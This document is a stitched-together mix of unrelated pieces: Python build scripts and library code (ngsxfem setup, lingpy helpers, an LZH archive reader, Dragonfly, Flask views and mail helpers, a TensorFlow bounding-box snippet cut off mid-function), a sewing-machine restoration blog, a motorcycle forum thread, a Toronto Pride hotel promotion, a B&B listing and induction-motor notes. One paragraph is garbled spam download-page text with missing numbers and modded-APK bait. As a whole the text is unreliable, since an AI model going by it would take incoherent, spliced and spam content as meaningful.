+ cfg] build_args += ['--', '-j2'] env = os.environ.copy() env['CXXFLAGS'] = '{} -DVERSION_INFO=\\"{}\\"'.format(env.get('CXXFLAGS', ''), self.distribution.get_version()) if not os.path.exists(self.build_temp): os.makedirs(self.build_temp) subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env) subprocess.check_call(['cmake', '--build', '.'] + build_args, cwd=self.build_temp) subprocess.check_call(['mv', 'ngsxfem_py.so', 'xfem'], cwd=self.build_lib) setup( name='xfem', version='2.0', author='Christoph Lehrenfeld', author_email='[email protected]', description='(ngs)xfem is an Add-on library to Netgen/NGSolve for unfitted/cut FEM.', long_description='(ngs)xfem is an Add-on library to Netgen/NGSolve which enables the use of unfitted finite element technologies known as XFEM, CutFEM, TraceFEM, Finite Cell, ... . ngsxfem is an academic software. Its primary intention is to facilitate the development and validation of new numerical methods.', url="https://github.com/ngsxfem/ngsxfem", ext_modules=[CMakeExtension('ngsxfem_py')], cmdclass=dict(build_ext=CMakeBuild), packages=["xfem"], package_dir={"xfem": "python"}, python_requires='>=3.5', )
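As a usage note, a CMake-backed extension like the one above is built through the standard setuptools entry points; assuming cmake and the NGSolve wrappers ngscxx/ngsld are on the PATH, the build is typically driven like this:

# from the repository root:
#   pip install .                          # invokes CMakeBuild for CMakeExtension('ngsxfem_py')
#   python3 setup.py build_ext --inplace   # explicit equivalent during development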
Today’s adventure was pretty straightforward for a change. I decided to install the upright arm shaft, which is the shaft with gears that connects the lower gear shaft with the upper gear shaft. A picture is below and a link to the disassembly of this baby is here. The upper gear is the smaller one, and that is the one that I took off to insert into the arm of the machine. The photo below shows the “flat” of the shaft where one of the set screws of the gear should rest when it is reassembled. If I haven’t mentioned it before, I’m lightly oiling all the parts with regular sewing machine oil before assembly. This helps the parts slide together more easily and adds a little protection from rust.

Here are photos of the bottom of Ms. Rusty showing the “before” and “after” shots. It’s easier to show pictures than to try to describe where to insert the shaft. Now here is a photo of the top end of the shaft, as seen through the arm side cover opening. What this photo is intended to show is that it is not possible to attach the top gear to the shaft without first moving the gear on the horizontal arm shaft out of the way. That is why I didn’t worry too much about exact placement when this gear was initially installed. After the horizontal gear is pushed back a bit, the upright gear can be put on. This can be a bit awkward for one person to do, since you have to push up on the shaft while aligning the gear over the hole and then tightening the screw. To solve this problem, I propped up the shaft at the bottom with a small box of toothpicks and then it went pretty smoothly. An alternative would be to have a helper or a third hand, but I had neither at the time.

You can tell the gear is in proper position on the shaft when, using the words of the Singer Adjuster Manual, the end of the shaft is approximately flush with the face of the gear. The next step is to bring the gear of the horizontal arm shaft into mesh with the gear of the upper arm shaft. It helps to have a pair of bent nose pliers for this step to pull and hold the horizontal gear in place while tightening the set screws. The photo below shows the completed assembly. Then I rotated the shafts at the balance wheel hub to make sure everything was turning smoothly and nothing was binding. The adjusters manual warns that the gears should not be pressed too tightly against the bushings as this could “retard the free rotation of the upright arm shaft”. When I was sure everything was working the way it should be (at least as far as I could tell), I applied grease to the gears and did a few more rotations to work the grease into the gears. I want to make sure those babies are ready for the big show when the time comes! Next time I’ll tackle the connecting rods. Oooooo – what fun!
import re from lingpy.sequence.sound_classes import ipa2tokens, tokens2class def make_sample_id(gloss_id, lang1, lang2, index1, index2): """ Sample IDs should uniquely identify a feature row. Sample sample ID: 98/English,German/1,1 """ assert lang1 < lang2 s = str(gloss_id) + '/' s += lang1 +','+ lang2 + '/' s += str(index1) +','+ str(index2) return s def explode_sample_id(sample_id, langs): """ Returns (gloss, lang1, lang2, index1, index2). Expects the set of all possible langs as second argument. Note: some datasets contain language names with chars such as: `/`, `,`. """ gloss = sample_id.split('/')[0] lang_part = sample_id.split('/', maxsplit=1)[1] lang_part = lang_part.rsplit('/', maxsplit=1)[0] for lang1 in langs: if lang_part.startswith(lang1+','): lang2 = lang_part[len(lang1)+1:] if lang2 in langs: break assert lang1 in langs assert lang2 in langs key1, key2 = sample_id.rsplit('/', maxsplit=1)[1].split(',') key1, key2 = int(key1) - 1, int(key2) - 1 return gloss, lang1, lang2, key1, key2 def clean_asjp(word): """ Removes ASJP diacritics. """ word = re.sub(r",","-",word) word = re.sub(r"\%","",word) word = re.sub(r"\*","",word) word = re.sub(r"\"","",word) word = re.sub(r".~","",word) word = re.sub(r"(.)(.)(.)\$",r"\2",word) word = re.sub(r" ","-",word) return word def ipa_to_asjp(w, params): """ Lingpy IPA-to-ASJP converter plus some cleanup. Expects the params {} to contain the key: sounds. This function is called on IPA datasets. """ w = w.replace('\"','').replace('-','').replace(' ','') wA = ''.join(tokens2class(ipa2tokens(w, merge_vowels=False), 'asjp')) wAA = clean_asjp(wA.replace('0','').replace('I','3').replace('H','N')) asjp = ''.join([x for x in wAA if x in params['sounds']]) assert len(asjp) > 0 return asjp def asjp_to_asjp(w, params): """ Cleans up the ASJP string and filters it to include the chars specified in the sounds parameter. This function is called on ASJP datasets. """ w = w.replace('\"','').replace('-','').replace(' ','') wAA = clean_asjp(w.replace('0','').replace('I','3').replace('H','N')) asjp = ''.join([x for x in wAA if x in params['sounds']]) assert len(asjp) > 0 return asjp def is_asjp_data(data): """ Expects {lang: {gloss: [transcription,]}}. Checks whether the translation strings are ASCII. """ return all([len(s.encode()) == len(s) for lang in data.values() for trans in lang.values() for s in trans ])
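A quick round-trip illustration of the sample-ID helpers above (the language names are chosen arbitrarily):

sid = make_sample_id(98, 'English', 'German', 1, 1)   # -> '98/English,German/1,1'
gloss, l1, l2, i1, i2 = explode_sample_id(sid, {'English', 'German'})
# explode_sample_id converts the 1-based indices back to 0-based ones
assert (gloss, l1, l2, i1, i2) == ('98', 'English', 'German', 0, 0)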
If it stays mild like it is, I might venture out on the Mighty Transalp either Tomoz or Friday if any fool be interested. Fish & Chips?? Always interested in fish and chips. . But my steed won't be seeing the road anytime soon I'm afraid. Rekon it's not worth takin ma machine oot on the salty roads, nae idea yet of whit wee nooks the muck gathers in yet. This wiz the oil cooler after a ride tae Mallaig in the autumn. The backside of the front guards. The rad after I pulled off most of the Krud. If me new lid comes soon I'm nipping out for a rip. Both Arais now deader than a dead thing. Piles of shite they are. Well, I had too long a lie-in today and so didn't get organised, then I found out my sister's coming up for her annual visit on Friday. Which lid did you go for? My mate bought one of them HJC flip fronts at the show and they look 1/2 decent? Pounce,,,,,,,,,,,,,,,,,,,,,,,jings that conjures up a tortured pic or two. Anyhoo here's a nice one and remember, read the full description before hitting the buy it now button. He needs one WITH hair. Nob mate...just pull the trigger on the one you've already tried. They won't be coming up in the sales over the next few months.
# -*- coding:utf-8 -*- # Copyright (c) 2010 Hidekazu Ohnishi. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # # * Neither the name of the author nor the names of its contributors # may be used to endorse or promote products derived from this # software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Lhafile, extension extract lzh file. Its interface is likey zipfile module is include in regular python environment. """ from __future__ import unicode_literals try: from cStringIO import BytesOrStringIO except ImportError: from io import BytesIO as BytesOrStringIO import datetime import os import os.path import struct import sys import lzhlib crc16 = lzhlib.crc16 if sys.version_info[0] == 3: string_types = (str,) def ord(v): return v else: string_types = (basestring,) def unpack(format, data): return struct.unpack(str(format), data) def is_lhafile(filename): try: LhaFile(filename) except: return False return True class BadLhafile(Exception): pass class LhaInfo(object): __slots__ = ( 'orig_filename', 'filename', 'directory', 'date_time', 'compress_type', 'comment', 'extra', 'create_system', 'create_version', 'extract_version', 'reserved', 'flag_bits', 'volume', 'internal_attr', 'external_attr', 'header_offset', 'file_offset', 'CRC', 'compress_size', 'file_size', ) def __init__(self): self.orig_filename = None self.filename = None self.directory = None self.date_time = None self.compress_type = None self.comment = None self.extra = None self.create_system = None self.create_version = None self.extract_version = None self.reserved = None self.flag_bits = None self.volume = None self.internal_attr = None self.external_attr = None self.header_offset = None self.file_offset = None self.CRC = None self.compress_size = None self.file_size = None def __str__(self): return '%s %s %08X %d %04X' % (self.filename, self.file_size, self.file_offset, self.compress_size, self.CRC) def __getstate__(self): return (self.orig_filename, self.filename, self.directory, self.date_time, self.compress_type, self.comment, self.extra, self.create_system, self.create_version, self.extract_version, self.reserved, self.flag_bits, self.volume, self.internal_attr, self.external_attr, self.header_offset, self.file_offset, self.CRC, self.compress_size, self.file_size) def __setstate__(self, state): 
(self.orig_filename, self.filename, self.directory, self.date_time, self.compress_type, self.comment, self.extra, self.create_system, self.create_version, self.extract_version, self.reserved, self.flag_bits, self.volume, self.internal_attr, self.external_attr, self.header_offset, self.file_offset, self.CRC, self.compress_size, self.file_size) = state class LhaFile(object): """ """ SUPPORTED_COMPRESS_TYPE = (b'-lhd-', b'-lh0-', b'-lh5-', b'-lh6-', b'-lh7-') def __init__(self, file, mode="r", compression=None, callback=None, args=None): """ Open the LZH file """ self.filelist = [] self.NameToInfo = {} self.mode = key = mode.replace('b', '')[0] if isinstance(file, string_types): self._fileParsed = 0 self.filename = file modeDict = {'r' : 'rb'} self.fp = open(file, modeDict[mode]) else: self._fileParsed = 1 self.fp = file self.filename = getattr(file, 'name', None) # Get file size initial_pos = self.fp.tell() self.fp.seek(0, 2) self.filesize = self.fp.tell() self.fp.seek(initial_pos, 0) if key == 'r': self._GetContents(callback=callback,args=args) else: if not self._fileParsed: self.fp.close() self.fp = None raise RuntimeError("Mode must be 'r'") def _GetContents(self, callback=None, args=None): try: info = self._RealGetContent() while info: if not info.compress_type in Lhafile.SUPPORTED_COMPRESS_TYPE: raise RuntimeError("Unsupported file is contained %s" % (info.compress_type,)) if callback: callback(args, self.fp.tell(), self.filesize, info) self.filelist.append(info) self.NameToInfo[info.filename] = info info = self._RealGetContent() except BadLhafile as e: raise if not self._fileParsed: self.fp.close() self.fp = None def _RealGetContent(self): fp = self.fp filesize = self.filesize initial_pos = fp.tell() is_read = lambda x: fp.tell() + x < filesize if fp.tell() == filesize - 1: return None if not is_read(26): raise BadLhafile("Header is broken") # Check OS level os_level = ord(fp.read(21)[20]) fp.seek(-21, 1) if not os_level in (0, 1, 2): raise BadLhafile("this file level is out of support range %d" % os_level) if os_level in (0, 1): header_size, checksum, signature, skip_size, \ file_size, modify_time, reserved , os_level, \ filename_length = unpack('<BB5sII4sBBB', fp.read(22)) if is_read(filename_length + 2): filename, crc = unpack('<%dsH' % filename_length, fp.read(filename_length + 2)) if os_level == 0: ext_header_size = 0 pass elif os_level == 1: extra_data_size = header_size - (5+4+4+2+2+1+1+1+filename_length+2+1+2) os_identifier, extra_data, ext_header_size \ = unpack('<c%dsH' % extra_data_size, fp.read(1 + extra_data_size + 2)) sum_ext_header_size = 0 directory = None comment = None compress_size = skip_size - sum_ext_header_size elif os_level == 2: header = fp.read(26) all_header_size, signature, compress_size, file_size, \ modify_time, reserved, os_level, crc, os_identifier, \ ext_header_size = unpack('<H5sIIIBBHBH', header) sum_ext_header_size = 0 directory = None comment = None while ext_header_size != 0: sum_ext_header_size += ext_header_size if not is_read(ext_header_size): raise BadLhafile("File is broken") (ext,) = unpack('<B', fp.read(1)) if ext == 0x00: # Common header dummy, ext_header_size \ = unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1)) elif ext == 0x01: # Filename header filename, ext_header_size \ = unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1)) elif ext == 0x02: # Directory name header directory, ext_header_size \ = unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1)) elif ext == 0x3F: # Comment header 
                comment, ext_header_size \
                    = unpack('<%dsH' % (ext_header_size - 3),
                             fp.read(ext_header_size - 1))
            elif ext == 0x40:
                # Attribute header
                if not ext_header_size == 5:
                    raise BadLhafile("file is broken")
                attr, ext_header_size = unpack('<HH', fp.read(4))
            else:
                # Skip the other header types
                dummy, ext_header_size \
                    = unpack('<%dsH' % (ext_header_size - 3),
                             fp.read(ext_header_size - 1))
        # skip to next header
        file_offset = fp.tell()
        if os_level in (0, 1):
            compress_size = skip_size - sum_ext_header_size
        if not is_read(compress_size):
            raise BadLhafile("Compress data is too short")
        fp.seek(compress_size, 1)
        # modify_time
        if os_level in (0, 1):
            year = (ord(modify_time[3]) >> 1) + 1980
            month = ((ord(modify_time[3]) << 8 | ord(modify_time[2])) >> 5) & 0x0F
            day = ord(modify_time[2]) & 0x1F
            hour = ord(modify_time[1]) >> 3
            minute = ((ord(modify_time[1]) << 8 | ord(modify_time[0])) >> 5) & 0x3F
            second = (ord(modify_time[0]) & 0x1F) * 2
            #print(os_level, year, month, day, hour, minute, second)
            try:
                date_time = datetime.datetime(year, month, day, hour, minute, second)
            except Exception:
                date_time = datetime.datetime(1970, 1, 1)
            create_time = date_time
        elif os_level in (2,):
            date_time = datetime.datetime.fromtimestamp(modify_time)
            create_time = date_time
        info = LhaInfo()
        # FIXME: hardcoding ISO-8859-1 is not very nice
        filename = filename.decode("ISO-8859-1")
        if directory is None:
            # for lhaplus archive
            #sjisname = unicode(filename, 'cp932')
            #if '\\' in sjisname:
            #    sjispath = [s.encode('cp932') for s in sjisname.split(u'\\')]
            #    filename = os.sep.join(sjispath)
            #    directory = os.sep.join(sjispath[:-1])
            pass
        else:
            #print(repr(directory))
            # FIXME: hardcoding ISO-8859-1 is not very nice
            directory = directory.decode("ISO-8859-1")
            directory = os.sep.join(directory.split('\xff'))
            filename = os.path.join(directory, filename)
        info.directory = directory
        info.filename = filename
        info.compress_size = compress_size
        info.file_size = file_size
        info.CRC = crc
        info.header_offset = initial_pos
        info.file_offset = file_offset
        info.external_attr = None
        info.internal_attr = None
        info.reserved = 0
        info.comment = comment
        info.compress_type = signature
        info.date_time = date_time
        if "\x00" in info.filename:
            info.filename, info.comment = info.filename.split("\x00")
        return info

    def lhaname(self):
        return self.filename

    def namelist(self):
        if self.filelist:
            return [d.filename for d in self.filelist
                    if d.compress_type in Lhafile.SUPPORTED_COMPRESS_TYPE]
        return None

    def infolist(self):
        return self.filelist

    def read(self, name):
        """Return file bytes (as a string) for 'name'."""
        if not self.fp:
            raise RuntimeError("Attempt to read LZH archive that was already closed")
        info = self.NameToInfo[name]
        if info.compress_type in Lhafile.SUPPORTED_COMPRESS_TYPE:
            self.fp.seek(info.file_offset)
            fin = BytesOrStringIO(self.fp.read(info.compress_size))
            fout = BytesOrStringIO()
            try:
                session = lzhlib.LZHDecodeSession(fin, fout, info)
                while not session.do_next():
                    pass
                outsize = session.output_pos
                crc = session.crc16
            except Exception as e:
                raise e
            if outsize != info.file_size:
                raise BadLhafile("%s output_size is not matched %d/%d %s" %
                                 (name, outsize, info.file_size, info.compress_type))
            if crc != info.CRC:
                raise BadLhafile("crc is not matched")
            fout.seek(0)
            bytes = fout.read()
        elif info.compress_type == b'-lhd-':
            raise RuntimeError("name is a directory")
        else:
            raise RuntimeError("Unsupported format")
        return bytes

# Alias used throughout the class body above.
Lhafile = LhaFile
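A short usage sketch of the reader above (the archive name is hypothetical):

archive = LhaFile('sample.lzh')      # parses all headers up front
for info in archive.infolist():
    print(info.filename, info.file_size, info.compress_type)
first = archive.namelist()[0]
payload = archive.read(first)        # decompressed bytes, size- and CRC-checked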
For the first time ever, Toronto will celebrate the LGBTQ community for an entire month - say hello to Pride Month. Beginning June 1st, the inaugural event kicks off with the official rainbow flag raising ceremony at Queen’s Park and culminates with the colourful and legendary Pride Parade on July 3. The month-long celebrations will spread to every corner of the city, transforming the streets into wild parties and drawing in over a million people from across the globe. In celebration of Pride Month, Booking.com, the global leader in connecting travellers with the widest choice of incredible places to stay, has scoped out the city’s best accommodations to experience the festivities and join in on all the fun!

Be in the heart of it all and stay in the Village! Home to the annual Pride Festival, the area between Church and Wellesley turns into a massive ten-day celebration hosting countless parties, performances by some of Toronto’s best drag queens and a huge street fair featuring local artisans and delicious food vendors. Luckily, you’ll wake up each morning to a full service breakfast at this quaint property and get the fuel you’ll need to keep going.

Located just steps from Queen’s Park, you might be fortunate enough to bump into Premier Kathleen Wynne, who will officially kick off celebrations with the annual raising of the rainbow flag. With options to stay in a one or two bedroom unit, the newly renovated designer suites are perfect for families or couples looking to enjoy the entirety of Pride Month. Complete with a full kitchen, dining and lounging space and access to an indoor pool, it’s guaranteed to feel like a home-away-from-home.

All we can say about this five-star accommodation is that it’s absolutely fabulous! The Euro-chic inspired luxury hotel is situated in the incredibly trendy Yorkville area and ideally suited for the diva inside all of us. Each suite comes furnished with a musical instrument and a large limestone bathroom perfect for winding down after a long night out. Moments away, guests will find the Royal Ontario Museum, which is scheduled to host a special one-night-only queer party soiree where go-go boys and drag stars will entertain amongst the dinosaurs.

As a proud supporter of the community, the Drake Hotel is a favourite party spot, usually offering extended hours during Pride. The gay-friendly space in the heart of Queen West hosts a slew of local bands and DJs almost every night, and is perfect for partygoers. Besides its lively nightlife, the boutique hotel boasts uniquely designed rooms and is surrounded by some of the city’s best restaurants, trendy bars and art galleries.

The heart of Pride might be in the Village, but you’ll find its beat comes from the newly developed waterfront. Expect a massive dance party at Sugar Beach, free outdoor film screenings at the Harbourfront Centre and a chance to try out your Spanish dance moves on the pier. With so much going on along the city’s south side, the elegant One King West Hotel will serve as the ideal home base and offer easy access to these must-do events.
# # This file is part of Dragonfly. # (c) Copyright 2007, 2008 by Christo Butcher # Licensed under the LGPL. # # Dragonfly is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Dragonfly is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with Dragonfly. If not, see # <http://www.gnu.org/licenses/>. # """ Dictation container base class ============================================================================ This class is used to store the recognized results of dictation elements within voice-commands. It offers access to both the raw spoken-form words and be formatted written-form text. The formatted text can be retrieved using :meth:`~DictationContainerBase.format` or simply by calling ``str(...)`` on a dictation container object. A tuple of the raw spoken words can be retrieved using :attr:`~DictationContainerBase.words`. """ #--------------------------------------------------------------------------- # Dictation base class -- base class for SR engine-specific containers # of dictated words. class DictationContainerBase(object): """ Container class for dictated words as recognized by the :class:`Dictation` element. This base class implements the general functionality of dictation container classes. Each supported engine should have a derived dictation container class which performs the actual engine- specific formatting of dictated text. """ def __init__(self, words): """ A dictation container is created by passing it a sequence of words as recognized by the backend SR engine. Each word must be a Unicode string. :param words: A sequence of Unicode strings. :type words: sequence-of-unicode """ self._words = tuple(words) self._formatted = None def __str__(self): return unicode(self).encode("windows-1252") def __unicode__(self): if self._formatted is None: self._formatted = self.format() return self._formatted def __repr__(self): message = u"%s(%s)" % (self.__class__.__name__, u", ".join(self._words)) return message.encode("windows-1252") @property def words(self): """ Sequence of the words forming this dictation. """ return self._words def format(self): """ Format and return this dictation as a Unicode object. """ return u" ".join(self._words)
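As an illustration of the base-class behaviour described above (engine-specific subclasses override format() for smarter spacing and capitalisation):

words = [u'hello', u'world']
container = DictationContainerBase(words)
assert container.words == (u'hello', u'world')
assert container.format() == u'hello world'
assert unicode(container) == u'hello world'   # Python 2 API, matching the module above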
This historic B&B is conveniently located within walking distance to downtown. A few units feature an electric fireplace. Not evaluated. Facilities, services, and décor characterize a mid-scale property. SR 29 exit Lincoln Ave E, 0.5 mi e to Jefferson St, then 0.5 mi s; jct Calistoga Ave. 1301 Jefferson St 94559.
# coding=utf-8 """Helper methods.""" from threading import Thread from flask import jsonify from werkzeug.exceptions import HTTPException from flask_mail import Message from users import mail, APP def make_json_error(ex): """Return errors as json. See http://flask.pocoo.org/snippets/83/ :param ex: An exception. :return: HttpResponse """ response = jsonify(message=str(ex)) response.status_code = ( ex.code if isinstance(ex, HTTPException) else 500) return response def send_mail(sender, recipients, subject, text_body, html_body): """To send a single email from sender to receiver synchronously :param sender: Sender of the email. :type sender: str :param recipients: Recipients email address. :type recipients: list :param subject: Subject of the email. :type subject: str :param text_body: Text of the body. :type text_body: str :param html_body: HTML of the body. :type html_body: str """ # Get mail server configuration message = Message(subject=subject, sender=sender, recipients=recipients) message.body = text_body message.html = html_body with APP.app_context(): mail.send(message) def send_async_mail(sender, recipients, subject, text_body, html_body): """To send email asynchronously :param sender: Sender of the email. :type sender: str :param recipients: Recipients email address. :type recipients: list :param subject: Subject of the email. :type subject: str :param text_body: Text of the body. :type text_body: str :param html_body: HTML of the body. :type html_body: str :return sender_thread: The thread for sending the email. :rtype: Thread """ sender_thread = Thread( target=send_mail, args=[sender, recipients, subject, text_body, html_body] ) sender_thread.start() return sender_thread
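A minimal usage sketch of the async helper above (the addresses are placeholders):

sender_thread = send_async_mail(
    sender='noreply@example.com',
    recipients=['user@example.com'],
    subject='Welcome',
    text_body='Hello!',
    html_body='<p>Hello!</p>')
sender_thread.join()  # optional: block until the send attempt completes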
6 Apr Google and Mozilla now offer bit versions of Chrome and Firefox for Windows. Here's how to find out what version you're running and how. 15 Dec bit Firefox web browser supports bit Windows systems and delivers high performance browsing on web games and other web. 9 Oct - 56 min - Uploaded by AzooTube CHEB FETHI -CHEB MOURAD - CHEB JALIL -7BIB HIMOUNE - CHEB WAHID - CHEB. 22 May - 20 min - Uploaded by Compilation Rai Officiel Best Rai Jdid Music (Compilation) • [Vol71]. Compilation Rai Official. THE YI SOON SHIN COLLECTABLE SILVER COIN. AVAILABLE NOW · THE SERIES. THE TRILOGY. This is a limited series based on the true story of Admiral . YI SOON SHIN is a historical fiction fantasy graphic novel comic book by Onrie Kompan, Publication history. 26 Oct - 4 min - Uploaded by weddingsofficial Weddings is an upcoming Malayalam romantic comedy film directed by Shafi and starring. 25 Feb - 1 min - Uploaded by ziyakaraoke recordingstudio contact for full karaoke whatsapp number ; + email - ziyakaraoke @bangertgardens.com Posts about changathi lyrics weddings written by vimalsuresh.. 21 Sep Download Free Sea Stars Apk Mod Unlock All - Download Unlimited Apk For Android. Sea Stars Apk Mod Unlock All - Direct Download Link. 28 Jan You are Downloading Sea Stars v Mod Latest APK The Size of Sea Stars v Mod is Mb. 30 May Metacritic Game Reviews, Surf's Up for Xbox , Surf's Up is an arcade surfing and extreme sports video game. The action is set at the annual. Platform:Xbox Surf's Up is exciting arcade surfing and extreme sports action. Head out to the "Reggie Belafonte Big Z Memorial Surf Off," where surfers from. 30 Apr - 4 min - Uploaded by Utree 3 TOp 5 First PeRson MOTORBIke motorcycle Racing GaMes If you like bike racing games or. 5 Jul After six years of fantastic urban motor racing action, British developer Bizarre GTA IV: The Lost And The Damned (Xbox , PS4, PC, ). Download free full version game Moto Racing for pc or notebook ✓ Best online game downloads at FreeGamePick.. 8 Oct Ugo Chirico - Fisico Cibernetico - Smart Card Console allows to (APDU) to the virtual reader with a virtual smart card for training with ISO. 12 Sep Ugo's Virtual Smart Card Reader end Emulator by Ugo Chirico. Versions: File name: bangertgardens.com 12 Sep No specific info about version Please visit the main page of Ugo's Virtual Smart Card Reader end Emulator on Software Informer.. Add hosts manager; Add enable windows defender feature. Fix PcaSvc DWS Build Support Windows Redstone. @Nummer DWS Lite Rollup edition. 8 Feb Offering a positive view of the family, Cox's HUMAN INTIMACY: MARRIAGE, THE FAMILY, AND ITS MEANING, Eleventh Edition discusses the. Offering a positive view of the family, Cox's HUMAN INTIMACY: MARRIAGE, THE FAMILY, the Family, and Its Meaning (Cengage Advantage Books) 11th Edition .. Frank Cox holds a Ph.D. in Educational Psychology from the University of.
# -*- coding: utf-8 -*-
from flask import render_template, request, redirect, url_for, flash
from . import mod
from flask.ext.login import login_required
from flask.ext import login
from app.models import paginate
from app.modules.adm.models.usuario import Perfil
from app.modules.adm.forms.perfil import PerfilForm
from app import db


@mod.route('/perfil', defaults={'page': 1})
@mod.route('/perfil/listar')
@mod.route('/perfil/listar/<int:page>')
@login_required
def perfil_listar_view(page):
    perfis = Perfil.query.order_by('nome ASC').all()
    res = paginate(perfis, page, Perfil, 8)
    return render_template('adm/perfil/listar.html', active_page='adm',
                           user=login.current_user, **res)


@mod.route('/perfil/adicionar', methods=["GET", "POST"])
@login_required
def perfil_adicionar_view():
    form = PerfilForm(request.form)
    if request.method == 'POST' and form.validate():
        p = Perfil()
        p.nome = form.nome.data
        p.ativo = form.ativo.data
        try:
            db.session.add(p)
            db.session.commit()
        except:
            flash(u'Não foi possível inserir o perfil', 'danger')
        else:
            # Only report success when the commit actually went through.
            flash(u'Perfil inserido com sucesso!', 'success')
        return redirect(url_for('.perfil_listar_view'))
    return render_template('adm/perfil/adicionar.html', active_page='adm',
                           user=login.current_user, form=form)


@mod.route('/perfil/editar/id/<int:id>', methods=["GET", "POST"])
@login_required
def perfil_editar_view(id):
    try:
        p = Perfil.query.get(id)
    except:
        flash(u'Perfil não encontrado', 'danger')
        return redirect(url_for('.perfil_listar_view'))
    form = PerfilForm(request.form, obj=p)
    if request.method == 'POST' and form.validate():
        p.nome = form.nome.data
        p.ativo = form.ativo.data
        try:
            db.session.add(p)
            db.session.commit()
        except:
            flash(u'Não foi possível alterar o perfil', 'danger')
        else:
            flash(u'Perfil foi alterado com sucesso!', 'success')
        return redirect(url_for('.perfil_listar_view'))
    return render_template('adm/perfil/editar.html', active_page='adm',
                           user=login.current_user, form=form)


@mod.route('/perfil/deletar/id/<int:id>', methods=["GET"])
@login_required
def perfil_deletar_view(id):
    try:
        p = Perfil.query.get(id)
        db.session.delete(p)
        db.session.commit()
        flash(u'Registro removido com sucesso', 'success')
    except:
        flash(u'Registro não encontrado no sistema', 'danger')
    return redirect(url_for('.perfil_listar_view'))


@mod.route('/perfil/exibir/id/<int:id>', methods=["GET"])
@login_required
def perfil_exibir_view(id):
    try:
        p = Perfil.query.get(id)
    except:
        flash(u'Perfil não encontrado!', 'danger')
        return redirect(url_for('.perfil_listar_view'))
    return render_template('adm/perfil/exibir.html', active_page='adm',
                           user=login.current_user, data=p)


@mod.route('/perfil/pesquisar', methods=["POST"])
@login_required
def perfil_pesquisar_view():
    q = request.form['q']
    if q != '':
        busca_perfil = Perfil.query.filter(Perfil.nome.like('%' + q + '%')).all()
    else:
        busca_perfil = Perfil.query.order_by('nome ASC').all()
    return render_template('adm/perfil/pesquisar.html', dados=busca_perfil)
The 3-phase power to an induction motor is applied to windings in the stator, the stationary outer part of the motor. The windings are connected into poles. The poles may be salient (protruding) or, more commonly, embedded in slots in the stator punchings. Poles for the three phases are placed in sequence, and there must be an even number of poles for each phase. A two-pole motor produces a magnetic field which rotates once each cycle of the mains power (3600 RPM at 60 Hz, 3000 RPM at 50 Hz). Increasing the number of poles slows the rotation of the magnetic field: the synchronous speed in RPM is 120 times the supply frequency in Hz divided by the number of poles. Four-pole (1800 RPM) and six-pole (1200 RPM) motors are the most common. An animation of the rotating field can be seen at https://people.ucalgary.ca/~aknigh/electrical_machines/fundamentals/f_ac_rotation.html.

The stator windings must be insulated from the steel laminations in the stator. In addition, the laminations must be insulated from adjacent laminations to prevent heating due to eddy currents. The insulation is provided by resins or oxides on the laminations and by tape or resins in the coils. The attached photo shows a cross-section of a high-voltage stator coil. Note the thin tape layer wound around 14 conductor triplets. Also note the thick tape insulation to ground. Copper is a very malleable material, and coils can show tremendous variety.

It is interesting to compare the terms and materials used in motor construction with those of the web handling industry. Conductors in coils are wound or pressed into shape using wire or bars. The tape insulation on high-voltage coils is wound around the coil. Pressure, vacuum, and heat are used to treat the resins in the insulation and the entire stator.
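The speed relationship above is easy to sanity-check in code; a minimal sketch (the function name is mine):

def synchronous_speed_rpm(frequency_hz, poles):
    """Synchronous speed of the rotating field: Ns = 120 * f / P."""
    return 120.0 * frequency_hz / poles

assert synchronous_speed_rpm(60, 2) == 3600.0   # two-pole motor at 60 Hz
assert synchronous_speed_rpm(50, 2) == 3000.0   # two-pole motor at 50 Hz
assert synchronous_speed_rpm(60, 4) == 1800.0   # four-pole motor
assert synchronous_speed_rpm(60, 6) == 1200.0   # six-pole motor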
import tensorflow as tf


def get_width_upright(bboxes):
    with tf.name_scope('BoundingBoxTransform/get_width_upright'):
        bboxes = tf.cast(bboxes, tf.float32)
        x1, y1, x2, y2 = tf.split(bboxes, 4, axis=1)
        width = x2 - x1 + 1.
        height = y2 - y1 + 1.

        # Despite the "ur" naming, urx/ury hold the centre of the bbox,
        # not its upper-right corner.
        urx = x1 + .5 * width
        ury = y1 + .5 * height

        return width, height, urx, ury


def encode(bboxes, gt_boxes, variances=None):
    with tf.name_scope('BoundingBoxTransform/encode'):
        (bboxes_width, bboxes_height,
         bboxes_urx, bboxes_ury) = get_width_upright(bboxes)

        (gt_boxes_width, gt_boxes_height,
         gt_boxes_urx, gt_boxes_ury) = get_width_upright(gt_boxes)

        if variances is None:
            variances = [1., 1.]

